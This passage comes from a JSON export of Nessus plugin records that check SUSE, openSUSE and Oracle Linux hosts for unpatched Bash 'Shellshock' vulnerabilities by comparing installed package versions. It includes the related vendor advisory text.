script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", 
reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:10", "description": "This patch was withdrawn by the openSUSE team, as the software was fixed prior to release. 
No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over BASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents and for loop issue", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2014-567.NASL", "href": "https://www.tenable.com/plugins/nessus/78115", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-567.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\n# @DEPRECATED@\n#\n# This script has been deprecated as it has been determined that the\n# advisory was withdrawn and fixed prior to release of openSUSE 13.2.\n#\n# Disabled on 2015/11/02.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78115);\n 
script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)\");\n script_summary(english:\"Check for the openSUSE-2014-567 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This patch was withdrawn by the openSUSE team, as the software was\nfixed prior to release. No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over\nBASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE\ndocuments and for loop issue\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-09/msg00063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=895475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The advisory was withdrawn by the vendor as the patch is not needed.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debugsource-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-devel-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-lang-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-debuginfo-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"readline-devel-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", 
reference:\"bash-debuginfo-32bit-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-75.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:32", "description": "From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. 
Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77951", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# Oracle Linux Security Advisory ELSA-2014-1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77951);\n 
script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004484.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004485.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004486.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:09", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . 
This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-564.NASL", "href": "https://www.tenable.com/plugins/nessus/77967", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77967);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", 
value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00052.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif 